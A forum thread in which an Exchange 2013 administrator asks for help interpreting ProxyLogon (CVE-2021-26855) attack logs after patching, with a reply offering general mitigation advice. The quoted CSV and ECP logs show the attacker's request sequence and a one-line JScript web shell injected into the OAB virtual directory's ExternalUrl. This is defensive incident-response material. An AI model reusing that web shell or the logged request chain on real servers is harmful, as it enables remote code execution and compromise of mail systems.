
Last week, a server running (only) Exchange Server 2013 was hit with probes from the ongoing HAFNIUM-style attack.

We ran the Health Checker script provided by Microsoft and found that we needed to upgrade. We upgraded to Exchange Server 2013 CU23 and applied all patches starting at around mid-day 2021-03-04. The upgrade was successful aside from needing to restart the Frontend transport service manually. After this, the same Health Checker script no longer lists any updates missing, and lists the KB500871 patch.

We have also run the Test-ProxyLogon.ps1 script provided by Microsoft, and it has produced a log file with a name ending in Cve-2021-26855.csv, which is just one of the four CVEs involved. Some guidance is given on interpreting this log file, but not much, and that's why I'm here.

This file lists various probes to autodiscover/autodiscover.xml, but also some to ecp/proxyLogon.ecp and then to various DDI/DDIService.svc endpoints, which looks to be the worrying part. (No such activity after the patch.) Here's what the .csv file shows:

"2021-03-04T08:58:32.625Z","30b797e4-c47d-42a5-9367-511c90f92305","666.666.666.666","mail.redacted.domain","/ecp/y.js","X-BEResource-Cookie","ExchangeServicesClient/0.0.0.0","ServerInfo~a]@EXCHSRVNAME.redacted.domain:444/autodiscover/autodiscover.xml?#","200"
"2021-03-04T08:58:33.969Z","44ebe2f7-47e4-468f-9f9a-47487faa7c95","666.666.666.666","mail.redacted.domain","/ecp/y.js","X-BEResource-Cookie","python-requests/2.25.1","ServerInfo~a]@EXCHSRVNAME.redacted.domain:444/mapi/emsmdb/?#","200"
"2021-03-04T08:58:37.031Z","3b0d1023-5972-477b-87e5-97936e34b120","666.666.666.666","mail.redacted.domain","/ecp/y.js","X-BEResource-Cookie","python-requests/2.25.1","ServerInfo~a]@EXCHSRVNAME.redacted.domain:444/ecp/proxyLogon.ecp?#","241"
"2021-03-04T08:58:51.547Z","56fc732f-d802-4d53-8960-0a39c3819e24","666.666.666.666","mail.redacted.domain","/ecp/y.js","X-BEResource-Cookie","python-requests/2.25.1","ServerInfo~a]@EXCHSRVNAME.redacted.domain:444/ecp/DDI/DDIService.svc/GetList?msExchEcpCanary=OrsNcBTX5U2VHYu8VQElRHVsiwd-4NgIo3aI3_vl85wADr4_ge3T19QV46uI-ZucvNcdQ-Fe-nk.&schema=VirtualDirectory#","200"
"2021-03-04T08:59:07.344Z","7c2ee687-d1e5-45f1-8f03-7c99d46bb889","666.666.666.666","mail.redacted.domain","/ecp/y.js","X-BEResource-Cookie","python-requests/2.25.1","ServerInfo~a]@EXCHSRVNAME.redacted.domain:444/ecp/DDI/DDIService.svc/SetObject?msExchEcpCanary=OrsNcBTX5U2VHYu8VQElRHVsiwd-4NgIo3aI3_vl85wADr4_ge3T19QV46uI-ZucvNcdQ-Fe-nk.&schema=OABVirtualDirectory#","200"
"2021-03-04T08:59:08.876Z","35530698-2402-415c-9717-0cd61709225d","666.666.666.666","mail.redacted.domain","/ecp/y.js","X-BEResource-Cookie","python-requests/2.25.1","ServerInfo~a]@EXCHSRVNAME.redacted.domain:444/ecp/DDI/DDIService.svc/SetObject?msExchEcpCanary=OrsNcBTX5U2VHYu8VQElRHVsiwd-4NgIo3aI3_vl85wADr4_ge3T19QV46uI-ZucvNcdQ-Fe-nk.&schema=ResetOABVirtualDirectory#","200"
"2021-03-04T08:59:11.047Z","2f5e6b62-f04d-4850-8044-4c59d15fc1d3","666.666.666.666","mail.redacted.domain","/ecp/y.js","X-BEResource-Cookie","python-requests/2.25.1","ServerInfo~a]@EXCHSRVNAME.redacted.domain:444/ecp/DDI/DDIService.svc/SetObject?msExchEcpCanary=OrsNcBTX5U2VHYu8VQElRHVsiwd-4NgIo3aI3_vl85wADr4_ge3T19QV46uI-ZucvNcdQ-Fe-nk.&schema=OABVirtualDirectory#","200"

Here's what the server logs in %EXCHANGEPATH%\V15\Logging\ECP\Server show:

2021-03-04T08:58:49.906Z,EXCHSRVNAME,ECP.Request,S:TIME=539;S:SID=432bcd4d-3b52-416f-b204-e3d38df0cc7e;S:CMD=Get-ActiveSyncVirtualDirectory.ADPropertiesOnly=$true;S:REQID=;S:URL=/ecp/DDI/DDIService.svc/GetList?msExchEcpCanary=OrsNcBTX5U2VHYu8VQElRHVsiwd-4NgIo3aI3_vl85wADr4_ge3T19QV46uI-ZucvNcdQ-Fe-nk.&schema=VirtualDirectory;S:EX=;S:ACTID=56fc732f-d802-4d53-8960-0a39c3819e24;S:RS=1;S:BLD=15.0.1044.25
2021-03-04T08:58:50.063Z,EXCHSRVNAME,ECP.Request,S:TIME=147;S:SID=432bcd4d-3b52-416f-b204-e3d38df0cc7e;S:CMD=Get-AutodiscoverVirtualDirectory.ADPropertiesOnly=$true;S:REQID=;S:URL=/ecp/DDI/DDIService.svc/GetList?msExchEcpCanary=OrsNcBTX5U2VHYu8VQElRHVsiwd-4NgIo3aI3_vl85wADr4_ge3T19QV46uI-ZucvNcdQ-Fe-nk.&schema=VirtualDirectory;S:EX=;S:ACTID=56fc732f-d802-4d53-8960-0a39c3819e24;S:RS=1;S:BLD=15.0.1044.25
2021-03-04T08:58:50.156Z,EXCHSRVNAME,ECP.Request,S:TIME=78;S:SID=432bcd4d-3b52-416f-b204-e3d38df0cc7e;S:CMD=Get-EcpVirtualDirectory.ADPropertiesOnly=$true;S:REQID=;S:URL=/ecp/DDI/DDIService.svc/GetList?msExchEcpCanary=OrsNcBTX5U2VHYu8VQElRHVsiwd-4NgIo3aI3_vl85wADr4_ge3T19QV46uI-ZucvNcdQ-Fe-nk.&schema=VirtualDirectory;S:EX=;S:ACTID=56fc732f-d802-4d53-8960-0a39c3819e24;S:RS=1;S:BLD=15.0.1044.25
2021-03-04T08:58:50.235Z,EXCHSRVNAME,ECP.Request,S:TIME=77;S:SID=432bcd4d-3b52-416f-b204-e3d38df0cc7e;S:CMD=Get-OabVirtualDirectory.ADPropertiesOnly=$true;S:REQID=;S:URL=/ecp/DDI/DDIService.svc/GetList?msExchEcpCanary=OrsNcBTX5U2VHYu8VQElRHVsiwd-4NgIo3aI3_vl85wADr4_ge3T19QV46uI-ZucvNcdQ-Fe-nk.&schema=VirtualDirectory;S:EX=;S:ACTID=56fc732f-d802-4d53-8960-0a39c3819e24;S:RS=1;S:BLD=15.0.1044.25
2021-03-04T08:58:50.438Z,EXCHSRVNAME,ECP.Request,S:TIME=201;S:SID=432bcd4d-3b52-416f-b204-e3d38df0cc7e;S:CMD=Get-OwaVirtualDirectory.ADPropertiesOnly=$true;S:REQID=;S:URL=/ecp/DDI/DDIService.svc/GetList?msExchEcpCanary=OrsNcBTX5U2VHYu8VQElRHVsiwd-4NgIo3aI3_vl85wADr4_ge3T19QV46uI-ZucvNcdQ-Fe-nk.&schema=VirtualDirectory;S:EX=;S:ACTID=56fc732f-d802-4d53-8960-0a39c3819e24;S:RS=1;S:BLD=15.0.1044.25
2021-03-04T08:58:50.516Z,EXCHSRVNAME,ECP.Request,S:TIME=67;S:SID=432bcd4d-3b52-416f-b204-e3d38df0cc7e;S:CMD=Get-WebServicesVirtualDirectory.ADPropertiesOnly=$true;S:REQID=;S:URL=/ecp/DDI/DDIService.svc/GetList?msExchEcpCanary=OrsNcBTX5U2VHYu8VQElRHVsiwd-4NgIo3aI3_vl85wADr4_ge3T19QV46uI-ZucvNcdQ-Fe-nk.&schema=VirtualDirectory;S:EX=;S:ACTID=56fc732f-d802-4d53-8960-0a39c3819e24;S:RS=1;S:BLD=15.0.1044.25
2021-03-04T08:58:50.610Z,EXCHSRVNAME,ECP.Request,S:TIME=80;S:SID=432bcd4d-3b52-416f-b204-e3d38df0cc7e;S:CMD=Get-PowershellVirtualDirectory.ADPropertiesOnly=$true;S:REQID=;S:URL=/ecp/DDI/DDIService.svc/GetList?msExchEcpCanary=OrsNcBTX5U2VHYu8VQElRHVsiwd-4NgIo3aI3_vl85wADr4_ge3T19QV46uI-ZucvNcdQ-Fe-nk.&schema=VirtualDirectory;S:EX=;S:ACTID=56fc732f-d802-4d53-8960-0a39c3819e24;S:RS=1;S:BLD=15.0.1044.25
2021-03-04T08:58:51.422Z,EXCHSRVNAME,ECP.Request,S:TIME=705;S:SID=432bcd4d-3b52-416f-b204-e3d38df0cc7e;S:CMD=Pipeline.1|Get-MailboxRegionalConfiguration;S:REQID=;S:URL=/ecp/DDI/DDIService.svc/GetList?msExchEcpCanary=OrsNcBTX5U2VHYu8VQElRHVsiwd-4NgIo3aI3_vl85wADr4_ge3T19QV46uI-ZucvNcdQ-Fe-nk.&schema=VirtualDirectory;S:EX=;S:ACTID=56fc732f-d802-4d53-8960-0a39c3819e24;S:RS=1;S:BLD=15.0.1044.25
2021-03-04T08:59:07.219Z,EXCHSRVNAME,ECP.Request,"S:TIME=14186;S:SID=432bcd4d-3b52-416f-b204-e3d38df0cc7e;'S:CMD=Set-OabVirtualDirectory.ExternalUrl=''http://f/<script language=""JScript"" runat=""server"">function Page_Load(){eval(Request[""i3QynV""],""unsafe"");}</script>''.Identity=''bd09f9b0-53da-4a02-a729-7808ab410f06''';S:REQID=;S:URL=/ecp/DDI/DDIService.svc/SetObject?msExchEcpCanary=OrsNcBTX5U2VHYu8VQElRHVsiwd-4NgIo3aI3_vl85wADr4_ge3T19QV46uI-ZucvNcdQ-Fe-nk.&schema=OABVirtualDirectory;S:EX=;S:ACTID=7c2ee687-d1e5-45f1-8f03-7c99d46bb889;S:RS=0;S:BLD=15.0.1044.25"
2021-03-04T08:59:07.297Z,EXCHSRVNAME,ECP.Request,S:TIME=64;S:SID=432bcd4d-3b52-416f-b204-e3d38df0cc7e;'S:CMD=Get-OabVirtualDirectory.ADPropertiesOnly=$true.Identity=''bd09f9b0-53da-4a02-a729-7808ab410f06''';S:REQID=;S:URL=/ecp/DDI/DDIService.svc/SetObject?msExchEcpCanary=OrsNcBTX5U2VHYu8VQElRHVsiwd-4NgIo3aI3_vl85wADr4_ge3T19QV46uI-ZucvNcdQ-Fe-nk.&schema=OABVirtualDirectory;S:EX=;S:ACTID=7c2ee687-d1e5-45f1-8f03-7c99d46bb889;S:RS=1;S:BLD=15.0.1044.25
2021-03-04T08:59:10.547Z,EXCHSRVNAME,ECP.LongRunning,S:TIME=1650;S:SID=432bcd4d-3b52-416f-b204-e3d38df0cc7e;'S:CMD=Get-OABVirtualDirectory.Identity=''bd09f9b0-53da-4a02-a729-7808ab410f06''';S:REQID=;S:URL=/ecp/DDI/DDIService.svc/SetObject?msExchEcpCanary=OrsNcBTX5U2VHYu8VQElRHVsiwd-4NgIo3aI3_vl85wADr4_ge3T19QV46uI-ZucvNcdQ-Fe-nk.&schema=ResetOABVirtualDirectory;S:EX=;S:ACTID=35530698-2402-415c-9717-0cd61709225d;S:RS=1;S:BLD=15.0.1044.25
2021-03-04T08:59:10.938Z,EXCHSRVNAME,ECP.LongRunning,S:TIME=367;S:SID=432bcd4d-3b52-416f-b204-e3d38df0cc7e;'S:CMD=Get-ExchangeServer.Identity=''EXCHSRVNAME''';S:REQID=;S:URL=/ecp/DDI/DDIService.svc/SetObject?msExchEcpCanary=OrsNcBTX5U2VHYu8VQElRHVsiwd-4NgIo3aI3_vl85wADr4_ge3T19QV46uI-ZucvNcdQ-Fe-nk.&schema=ResetOABVirtualDirectory;S:EX=;S:ACTID=35530698-2402-415c-9717-0cd61709225d;S:RS=1;S:BLD=15.0.1044.25
2021-03-04T08:59:10.954Z,EXCHSRVNAME,ECP.Request,S:TIME=692;S:SID=432bcd4d-3b52-416f-b204-e3d38df0cc7e;'S:CMD=Set-OabVirtualDirectory.ExternalUrl=$null.Identity=''bd09f9b0-53da-4a02-a729-7808ab410f06''';S:REQID=;S:URL=/ecp/DDI/DDIService.svc/SetObject?msExchEcpCanary=OrsNcBTX5U2VHYu8VQElRHVsiwd-4NgIo3aI3_vl85wADr4_ge3T19QV46uI-ZucvNcdQ-Fe-nk.&schema=OABVirtualDirectory;S:EX=;S:ACTID=2f5e6b62-f04d-4850-8044-4c59d15fc1d3;S:RS=0;S:BLD=15.0.1044.25
2021-03-04T08:59:11.016Z,EXCHSRVNAME,ECP.Request,S:TIME=60;S:SID=432bcd4d-3b52-416f-b204-e3d38df0cc7e;'S:CMD=Get-OabVirtualDirectory.ADPropertiesOnly=$true.Identity=''bd09f9b0-53da-4a02-a729-7808ab410f06''';S:REQID=;S:URL=/ecp/DDI/DDIService.svc/SetObject?msExchEcpCanary=OrsNcBTX5U2VHYu8VQElRHVsiwd-4NgIo3aI3_vl85wADr4_ge3T19QV46uI-ZucvNcdQ-Fe-nk.&schema=OABVirtualDirectory;S:EX=;S:ACTID=2f5e6b62-f04d-4850-8044-4c59d15fc1d3;S:RS=1;S:BLD=15.0.1044.25
2021-03-04T08:59:14.579Z,EXCHSRVNAME,ECP.LongRunning,S:TIME=3641;S:SID=432bcd4d-3b52-416f-b204-e3d38df0cc7e;'S:CMD=Remove-OABVirtualDirectory.Force=$true.Identity=''EXCHSRVNAME\OAB (Default Web Site)''';S:REQID=;S:URL=/ecp/DDI/DDIService.svc/SetObject?msExchEcpCanary=OrsNcBTX5U2VHYu8VQElRHVsiwd-4NgIo3aI3_vl85wADr4_ge3T19QV46uI-ZucvNcdQ-Fe-nk.&schema=ResetOABVirtualDirectory;S:EX=;S:ACTID=35530698-2402-415c-9717-0cd61709225d;S:RS=0;S:BLD=15.0.1044.25
2021-03-04T08:59:23.391Z,EXCHSRVNAME,ECP.LongRunning,S:TIME=8804;S:SID=432bcd4d-3b52-416f-b204-e3d38df0cc7e;'S:CMD=New-OABVirtualDirectory.WebSiteName=''Default Web Site''.Server=''EXCHSRVNAME''.Role=''ClientAccess''.InternalURL=''https://EXCHSRVNAME.redacted.domain/OAB''.Path=''C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\OAB''';S:REQID=;S:URL=/ecp/DDI/DDIService.svc/SetObject?msExchEcpCanary=OrsNcBTX5U2VHYu8VQElRHVsiwd-4NgIo3aI3_vl85wADr4_ge3T19QV46uI-ZucvNcdQ-Fe-nk.&schema=ResetOABVirtualDirectory;S:EX=;S:ACTID=35530698-2402-415c-9717-0cd61709225d;S:RS=1;S:BLD=15.0.1044.25
2021-03-04T08:59:23.454Z,EXCHSRVNAME,ECP.LongRunning,S:TIME=59;S:SID=432bcd4d-3b52-416f-b204-e3d38df0cc7e;'S:CMD=Get-OabVirtualDirectory.ADPropertiesOnly=$true.Identity=''EXCHSRVNAME\OAB (Default Web Site)''';S:REQID=;S:URL=/ecp/DDI/DDIService.svc/SetObject?msExchEcpCanary=OrsNcBTX5U2VHYu8VQElRHVsiwd-4NgIo3aI3_vl85wADr4_ge3T19QV46uI-ZucvNcdQ-Fe-nk.&schema=ResetOABVirtualDirectory;S:EX=;S:ACTID=35530698-2402-415c-9717-0cd61709225d;S:RS=1;S:BLD=15.0.1044.25

As far as I can understand, this injected and made visible a web shell. However, according to the log in ESET Mail Security (antivirus software), the file in question (named RedirSuiteServerProxy.aspx) was intercepted as w3wp.exe (IIS) was attempting to retrieve it, and was deleted due to being a known "JS/Exploit.CVE-2021-26855.Webshell.A trojan". The name of the file also does not appear in any of the IIS access logs. The IP address associated with these requests (anonymized as 666.666.666.666) does appear, but only with lines directly corresponding to those requests, and not with something else that would indicate actually accessing and using the web shell.

I have run the recently updated MSERT/Microsoft Safety Scanner 1.0.3001.0, and its full scan gives a clean bill of health. Aside from that, I have also checked for known event log events that would have been posted by the three other vulnerabilities, and none of them can be found by me or by the previously mentioned script, which checks for them. I have double checked that no new users or groups have appeared, or existing users been moved to privileged groups either locally or within the domain. I have also checked for various other signs as detailed on Microsoft's page, like newly created .aspx files, .zip/.rar/.7z files in C:\ProgramData\ as used for exfiltration, and so on.

With all this in mind, my question is: did the attack do anything beyond creating a web shell which the antivirus software promptly stopped from being used; did the absence of signs of the other CVEs mean it never escalated to those steps; and are there further things to look into?

Jesper

1 Answer


According to my research, these vulnerabilities are used as part of an attack chain. The initial attack requires the ability to make an untrusted connection to Exchange server port 443. Patching Exchange Servers immediately is the best first step. Other temporary options can include protection by restricting untrusted connections, or by setting up a VPN to separate the Exchange server from external access. Using this mitigation will only protect against the initial portion of the attack; other portions of the attack chain can be triggered if an attacker already has access or can convince an administrator to run a malicious file.

And the security update release contains fixes for seven security vulnerabilities affecting Exchange Server. Of these, four vulnerabilities were known to have been used in limited, targeted attacks against on-premises Exchange servers.

In addition, the blog Web shell attacks continue to rise may be helpful to you.

Joy Zhang
  • The server is fully patched against all of the four vulnerabilities now, and no further attempts have been seen since the patch. I understand the working principle of a web shell and have read the post before, I just don't know if there are indications that it was used that I'm missing. – Jesper Mar 09 '21 at 09:46
  • By "it was used" I mean that anyone accessed the web shell and performed actions using it, not that it was installed in the first place. If hosted by IIS, it would have produced logs in the log files and I can't see any such logs. – Jesper Mar 09 '21 at 10:00